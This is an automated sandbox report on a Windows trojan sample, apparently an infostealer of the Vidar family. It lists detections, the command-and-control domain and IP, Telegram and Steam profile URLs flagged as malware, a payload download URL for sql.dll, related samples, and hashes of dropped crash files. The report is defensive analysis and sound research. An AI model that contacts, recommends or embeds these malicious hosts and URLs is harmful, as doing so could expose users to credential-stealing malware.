Source	Detection	Scanner	Label
lCVFGKfczi.exe	37%	ReversingLabs	Win32.Trojan.Generic
lCVFGKfczi.exe	100%	Avira	HEUR/AGEN.1310458
lCVFGKfczi.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://t.me/ae5ed	100%	URL Reputation	malware
https://steamcommunity.com/profiles/76561199780418869	100%	URL Reputation	malware
http://cowod.hopto.org_DEBUG.zip/c	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	unknown
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	unknown
lade.petperfectcare.com	95.164.90.97	true	true	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://steamcommunity.com/profiles/76561199780418869	true	URL Reputation: malware	unknown
http://lade.petperfectcare.com/	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://lade.petperfectcare.com:80e	MSBuild.exe, 00000003.00000002.1980647487.00000000004F0000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://lade.petperfectcare.com/f	MSBuild.exe, 00000003.00000002.1981603687.00000000011C5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://lade.petperfectcare.com/c	MSBuild.exe, 00000003.00000002.1981603687.00000000011DB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://t.me/ae5ed	lCVFGKfczi.exe, lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://cowod.hopto.org_DEBUG.zip/c	lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://lade.petperfectcare.com:80nfwqnfwovfdkhttps://steamcommunity.com/profiles/76561199780418869u5	lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp	true		unknown
http://lade.petperfectcare.com:80t-Disposition:	MSBuild.exe, 00000003.00000002.1980647487.00000000004B3000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://lade.petperfectcare.com//(	MSBuild.exe, 00000003.00000002.1981603687.00000000011AB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://lade.petperfectcare.com/4	MSBuild.exe, 00000003.00000002.1981603687.00000000011AB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://lade.petperfectcare.com/T	MSBuild.exe, 00000003.00000002.1981603687.00000000011C5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://upx.sf.net	Amcache.hve.6.dr	false	URL Reputation: safe	unknown
https://t.me/ae5edu55uhttps://steamcommunity.com/profiles/76561199780418869sql.dllsqlp.dllMozilla/5.	lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp	true		unknown
http://lade.petperfectcare.com:80	lCVFGKfczi.exe, lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.1980647487.00000000004B3000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1980647487.00000000004F0000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://lade.petperfectcare.com:80/sql.dllineID:	MSBuild.exe, 00000003.00000002.1980647487.000000000056B000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://lade.petperfectcare.com:80/sql.dll	MSBuild.exe, 00000003.00000002.1980647487.000000000048F000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1980647487.000000000056B000.00000040.00000400.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
95.164.90.97	lade.petperfectcare.com	Gibraltar		39762	VAKPoltavaUkraineUA	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528302
Start date and time:	2024-10-07 18:45:18 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	lCVFGKfczi.exe renamed because original name is a hash value
Original Sample Name:	b84100c670bb19e92bfb62423048aa43.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@9/10@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 43 Number of non-executed functions: 132
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.126.32.76, 40.126.32.74, 40.126.32.134, 40.126.32.138, 40.126.32.68, 20.190.160.22, 40.126.32.72, 20.190.160.20, 199.232.214.172, 192.229.221.95, 20.189.173.22, 52.149.20.212, 13.95.31.18, 20.42.73.29, 20.242.39.171
Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, glb.cws.prod.dcat.dsp.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: lCVFGKfczi.exe

Simulations

Behavior and APIs

Time	Type	Description
12:46:24	API Interceptor	2x Sleep call for process: WerFault.exe modified
12:46:36	API Interceptor	1x Sleep call for process: MSBuild.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
95.164.90.97	VLSiVR4Qxs.exe	Get hash	malicious	LummaC, Vidar	Browse	lade.petperfectcare.com/
	file.exe	Get hash	malicious	Vidar	Browse	lade.petperfectcare.com/
	gIXLkTvFeC.exe	Get hash	malicious	Vidar	Browse	lade.petperfectcare.com/
	0FZVLEdDuc.exe	Get hash	malicious	Vidar	Browse	lade.petperfectcare.com/
	file.exe	Get hash	malicious	Vidar	Browse	lade.petperfectcare.com/
	MPil9jkBPG.exe	Get hash	malicious	Vidar	Browse	lade.petperfectcare.com/
	gpfSnYlScw.exe	Get hash	malicious	Vidar	Browse	lade.petperfectcare.com/
	file.exe	Get hash	malicious	Vidar	Browse	lade.petperfectcare.com/
	file.exe	Get hash	malicious	Vidar	Browse	lade.petperfectcare.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	z71htmivzKAUpOkr2J.exe	Get hash	malicious	AgentTesla	Browse	13.107.246.45
	https://forms.office.com/Pages/ShareFormPage.aspx?id=W8eUhlA4rUOuklSyoCn21mtmgAvPzYFJuSM99R6gX3dUQ1IyWUM1UUhTS1pWQ0xXNkI3RzlRRkFIVi4u&sharetoken=93tGEOrxpFy3X0nnxFcr	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	file.exe	Get hash	malicious	Vidar	Browse	13.107.246.45
	https://email.oxblue.com/e3t/Ctc/Q+113/cdDrv04/VXdfjN46m5dxW4GJlKB4fd0DdW2sbCLr5lTFq6N7Hm8xT3qgyTW7Y8-PT6lZ3lzW1ccS1H8Y8rzXW1hrlTV77h1NhW5_pVzH8bsnn6W1PWxqV8D5TN_W4_z5yx2Cz_4sMrZF-GqDHzcW8pZQ3N3BhYgKW3tmwg72n4TxDW4fS46V1-s7dgW57YVF64HfrMMW2BxxC75X21XdW1nBYw_1PMVGyW8s_YKQ6BTQZmW8wDJ4k3-yNbbW2_BGfy66mfVdW937hqt5kq1CcW4XD3mN54BQSWW4G8TK98NTx7zW74frv25zlZbQW5ztJ6n6fGJFrMSqBjr36qwYW2tk9Xh21wMKrW5RXwDq1M2mmrW3nyq_P20wBvNN8-tVH1nqcD1W5m3Vz04sj9CQf2ygfDq04	Get hash	malicious	Unknown	Browse	13.107.246.45
	YSjOEAta07.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	Payment.vbs	Get hash	malicious	FormBook	Browse	13.107.246.45
	original.eml	Get hash	malicious	Tycoon2FA	Browse	13.107.246.45
	5fe2eenspI.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	http://46.27.141.62	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://kohlhage-de.powerappsportals.com/	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	13.107.246.45
lade.petperfectcare.com	VLSiVR4Qxs.exe	Get hash	malicious	LummaC, Vidar	Browse	95.164.90.97
	file.exe	Get hash	malicious	Vidar	Browse	95.164.90.97
	gIXLkTvFeC.exe	Get hash	malicious	Vidar	Browse	95.164.90.97
	0FZVLEdDuc.exe	Get hash	malicious	Vidar	Browse	95.164.90.97
	file.exe	Get hash	malicious	Vidar	Browse	95.164.90.97
	MPil9jkBPG.exe	Get hash	malicious	Vidar	Browse	95.164.90.97
	gpfSnYlScw.exe	Get hash	malicious	Vidar	Browse	95.164.90.97
	file.exe	Get hash	malicious	Vidar	Browse	95.164.90.97
	file.exe	Get hash	malicious	Vidar	Browse	95.164.90.97
bg.microsoft.map.fastly.net	NdSXVNeoET.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	199.232.210.172
	vEcIHT68pU.exe	Get hash	malicious	LummaC	Browse	199.232.214.172
	file.exe	Get hash	malicious	Vidar	Browse	199.232.214.172
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	199.232.214.172
	file.exe	Get hash	malicious	Stealc	Browse	199.232.210.172
	https://email.oxblue.com/e3t/Ctc/Q+113/cdDrv04/VXdfjN46m5dxW4GJlKB4fd0DdW2sbCLr5lTFq6N7Hm8xT3qgyTW7Y8-PT6lZ3lzW1ccS1H8Y8rzXW1hrlTV77h1NhW5_pVzH8bsnn6W1PWxqV8D5TN_W4_z5yx2Cz_4sMrZF-GqDHzcW8pZQ3N3BhYgKW3tmwg72n4TxDW4fS46V1-s7dgW57YVF64HfrMMW2BxxC75X21XdW1nBYw_1PMVGyW8s_YKQ6BTQZmW8wDJ4k3-yNbbW2_BGfy66mfVdW937hqt5kq1CcW4XD3mN54BQSWW4G8TK98NTx7zW74frv25zlZbQW5ztJ6n6fGJFrMSqBjr36qwYW2tk9Xh21wMKrW5RXwDq1M2mmrW3nyq_P20wBvNN8-tVH1nqcD1W5m3Vz04sj9CQf2ygfDq04	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://protect2.fireeye.com/v1/url?k=31323334-50bba2bf-3132a9b3-4544474f5631-9e1721db7158d01a&q=1&e=fd99754d-b74a-4ce2-bf27-63a41e808f94&u=https%3A%2F%2Fwww.rhris.com%2FEmailEmploymentValidation.cfm%3FEmploymentRefID%3DE84F959AEA960B8186C356E23E6C822C8E204B6A75564EECEC1823507D68DDBF	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://future.nhs.uk	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://eu.pbe.encryption.symantec.com/login.html?msgUserId=682e23d9f715c97c&enterprise=lgas&locale=en_US	Get hash	malicious	Unknown	Browse	199.232.210.172
	YSjOEAta07.exe	Get hash	malicious	FormBook	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
VAKPoltavaUkraineUA	VLSiVR4Qxs.exe	Get hash	malicious	LummaC, Vidar	Browse	95.164.90.97
	file.exe	Get hash	malicious	Vidar	Browse	95.164.90.97
	gIXLkTvFeC.exe	Get hash	malicious	Vidar	Browse	95.164.90.97
	0FZVLEdDuc.exe	Get hash	malicious	Vidar	Browse	95.164.90.97
	file.exe	Get hash	malicious	Vidar	Browse	95.164.90.97
	MPil9jkBPG.exe	Get hash	malicious	Vidar	Browse	95.164.90.97
	gpfSnYlScw.exe	Get hash	malicious	Vidar	Browse	95.164.90.97
	file.exe	Get hash	malicious	Vidar	Browse	95.164.90.97
	file.exe	Get hash	malicious	Vidar	Browse	95.164.90.97
	bind.aspx.exe	Get hash	malicious	Vidar	Browse	95.164.119.162

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	1f13Cs1ogc.exe	Get hash	malicious	Stealc	Browse	13.107.246.45
	file.exe	Get hash	malicious	Credential Flusher	Browse	13.107.246.45
	https://www.rhris.com/EmailEmploymentValidation.cfm?EmploymentRefID=E84F959AEA960B8186C356E23E6C822C8E204B6A75564EECEC1823507D68DDBF	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://future.nhs.uk	Get hash	malicious	Unknown	Browse	13.107.246.45
	file.exe	Get hash	malicious	Credential Flusher	Browse	13.107.246.45
	https://fenster-mark-gmbhsharefile.btn-ebikes.com/	Get hash	malicious	Unknown	Browse	13.107.246.45
	Hscni Remittance_8115919700_16831215.html	Get hash	malicious	Tycoon2FA	Browse	13.107.246.45
	xwZfYpo16i.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Stealc	Browse	13.107.246.45
	High Court Summons Notice.pdf	Get hash	malicious	Unknown	Browse	13.107.246.45
	file.exe	Get hash	malicious	Credential Flusher	Browse	13.107.246.45
28a2c9bd18a11de089ef85a160da29e4	1f13Cs1ogc.exe	Get hash	malicious	Stealc	Browse	13.107.246.45
	file.exe	Get hash	malicious	Credential Flusher	Browse	13.107.246.45
	VLSiVR4Qxs.exe	Get hash	malicious	LummaC, Vidar	Browse	13.107.246.45
	vEcIHT68pU.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	5rVhexjLCx.exe	Get hash	malicious	Stealc	Browse	13.107.246.45
	https://t.dripemail3.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzI4MzEwODA2LCJuYmYiOjE3MjgzMTA4MDYsImFjY291bnRfaWQiOiIyNzYyNjA5IiwiZGVsaXZlcnlfaWQiOiJwODJtNGNzMzB4cXl2Zmh0NzQxaSIsInRva2VuIjoicDgybTRjczMweHF5dmZodDc0MWkiLCJzZW5kX2F0IjoxNzI4MzA5NzMyLCJlbWFpbF9pZCI6OTk2NDE4NiwiZW1haWxhYmxlX3R5cGUiOiJCcm9hZGNhc3QiLCJlbWFpbGFibGVfaWQiOjM5NTQwMTYsInVybCI6Imh0dHBzOi8vZGFpbHlhbGFza2EuY29tL25ld3M_X19zPWw5bzljOTZzbG8xZjF3aGFiODZrJnV0bV9zb3VyY2U9ZHJpcCZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9jYW1wYWlnbj0lRjAlOUYlOTElOEMrV2UrTWFkZStJdCtFYXN5K0ZvcitZb3UrJUYwJTlGJTkxJThDIn0.MNRoosOspCCWwx3VuYY41W-crcEzfjjfIELlO_QMAdM	Get hash	malicious	HtmlDropper	Browse	13.107.246.45
	https://forms.office.com/Pages/ShareFormPage.aspx?id=W8eUhlA4rUOuklSyoCn21mtmgAvPzYFJuSM99R6gX3dUQ1IyWUM1UUhTS1pWQ0xXNkI3RzlRRkFIVi4u&sharetoken=93tGEOrxpFy3X0nnxFcr	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	Contract_Agreement_Monday October 2024.pdf	Get hash	malicious	Unknown	Browse	13.107.246.45
	file.exe	Get hash	malicious	Vidar	Browse	13.107.246.45
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	13.107.246.45

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MSBuild.exe_7d9f448d78fec3b9946c73ac6e84ff27254967c_027e51c2_10b3ea86-3d74-4b1d-ad98-bdc13251b496\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0699614957794892
Encrypted:	false
SSDEEP:	192:zkIubcOYdTA0Nvw4sjMAZrdAmN9zuiFkZ24IO8q:PuDqTbNvwpjJH9zuiFkY4IO8q
MD5:	C50D511371060F15573EFA09383231FE
SHA1:	DE545F5EC7B39446F0A5E1557568EC9C1AB3F891
SHA-256:	72C326D34C5D6381D146145FED0673D7C6AA71E8F497BAD377DC75F90955906F
SHA-512:	1FD0ED27908361ADFFF1F138A3658858DA7383F165E53CE57ECFB198B137266D7A8F10E986FEC44756B94C395365C2DC4E5106B7558CCE6F4CBBA782BDC119BA
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.7.9.3.1.9.6.4.5.2.2.3.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.7.9.3.1.9.7.7.9.6.0.1.0.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.0.b.3.e.a.8.6.-.3.d.7.4.-.4.b.1.d.-.a.d.9.8.-.b.d.c.1.3.2.5.1.b.4.9.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.e.a.0.8.d.a.2.-.4.8.d.7.-.4.9.b.e.-.8.1.1.9.-.6.1.e.f.b.6.3.f.a.1.a.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.0.c.-.0.0.0.1.-.0.0.1.4.-.9.e.b.a.-.f.5.6.8.d.8.1.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.e.6.2.5.6.a.0.1.5.9.6.8.8.f.0.5.6.0.b.0.1.5.d.a.4.d.9.6.7.f.4.1.c.b.f.8.c.9.b.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_lCVFGKfczi.exe_dd6fc0a24c1ab7b4dde8979f3c28f822e740f212_5ff4b866_ea499fab-ca7d-4417-8dd7-5f26e4068e9c\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6540635265483035
Encrypted:	false
SSDEEP:	96:Nv8FqQ0FJZ6KsYyAyA1fxQXIDcQvc6QcEVcw3cE/H+HbHg/5hZAX/d5FMT2SlPk9:KcQs6K40BU/AjhzuiFkZ24IO8n
MD5:	24046B75302B6F55D478F9C29F2C1284
SHA1:	7C5B52DBDF567B74CE7D17FAEB35DAAFE1DFA0AD
SHA-256:	3567E33DB2F2794F3EC1BF488F470CF2EBAB91E28ADC03316CE54CBE8261E187
SHA-512:	9CEDB8E8FAB96C8C0228532731772D3EAE25AB9FEC9504E2294712E488AE6E21B070D84DBE6932AE2A9005E731A7B24A4CAF71071A7A57164419BE97E5AE33EA
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.7.9.3.1.6.9.4.3.3.4.1.9.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.7.9.3.1.6.9.8.0.8.4.1.1.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.a.4.9.9.f.a.b.-.c.a.7.d.-.4.4.1.7.-.8.d.d.7.-.5.f.2.6.e.4.0.6.8.e.9.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.d.c.9.1.d.6.9.-.f.b.2.9.-.4.2.d.2.-.a.b.4.3.-.1.0.f.8.a.9.5.7.2.c.0.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.C.V.F.G.K.f.c.z.i...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.p.r.o.q.u.o.t.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.e.c.-.0.0.0.1.-.0.0.1.4.-.3.e.e.4.-.d.5.6.8.d.8.1.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.7.d.0.3.f.6.a.1.a.a.4.5.0.5.0.f.7.b.e.5.5.f.8.7.6.f.e.a.2.d.c.0.0.0.0.0.9.0.4.!.0.0.0.0.5.9.2.f.3.a.e.f.7.a.d.9.3.d.b.6.5.2.7.d.8.e.9.d.0.6.b.2.e.b.b.a.e.1.a.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3616.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Oct 7 16:46:09 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	35464
Entropy (8bit):	1.674361653226171
Encrypted:	false
SSDEEP:	96:5H84WUe6zJWsEAkGKni77sX3APmCFJZT7sj2J3rAFxMg7BWIkWIPTkI4JytUCQJK:uTU7nSOtOCFJZEqJ3/hgJytUCRv
MD5:	38EC3CEB28FFE8FD1FB088AE3190ED72
SHA1:	18C523FDF6098E838D82C4B9C3DFC7C692AF8014
SHA-256:	44928FC56B56AC242842B221E0B4AF52B89667E916A6089F4EAA2F2F2D4D3D2E
SHA-512:	ABA7A755682FA183AFD639D61D9EFE4D1384731C5BEE247987B89DBF3A0331A043E1FFFBE2827F0C1FDE5EC325C75EE7350C09F1127CC342DF3D600EBDF24FC1
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......Q..g........................d...........................T.......8...........T...........P...8.......................................................................................................eJ..............GenuineIntel............T...........P..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3674.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8328
Entropy (8bit):	3.7007404467825675
Encrypted:	false
SSDEEP:	192:R6l7wVeJhlK6KLk6Y9ZSUXlgmfQGWuVprr89bkasfZMm:R6lXJe6Ko6YDSUXlgmfQGWu0k5fX
MD5:	E40DBBCF05489ABC02888A41620E5060
SHA1:	41CBF11804020E6FB4287777CCC9946E8648DD1C
SHA-256:	26365AD3D6A871BAA45887CAE67BBCE9F32DA05A8FF9CB747EDF4CF974925CD7
SHA-512:	4959D7B18F1585011504A0194A909BFFE2B8AB0DA58F692E0E343E858AE108ADA9516BBCAA820EFCF66542B625F9E9BEBD1D8882388B398FA8DC26B385AD06D8
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.0.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER36A4.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4678
Entropy (8bit):	4.49462098810929
Encrypted:	false
SSDEEP:	48:cvIwWl8zsEuJg77aI9t6WpW8VYvYm8M4JDeBwbFY2to+q8MscGaCiJfuZuhd:uIjfEkI7b77V/J8yaMIhd
MD5:	7EACD858711D72270FBB68CB183258F8
SHA1:	FC30E0B42A6DCA9D989D12CABA1CEC35AB05CEB1
SHA-256:	4BAF1B8EE56FD4C656AC0AC7A17E0FD72191AE843F15DD7DC7D7ED5532759611
SHA-512:	4EA200222EB31AC2B79C08B8984196B10F80865BBA441B8BBDCA69F17C35FD42C193227DD54952B9E3BFCBFD5F1B8F02DDA5EE26EC76AEAEB1488CD377D5D1D6
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533268" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9FAD.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Oct 7 16:46:37 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	146104
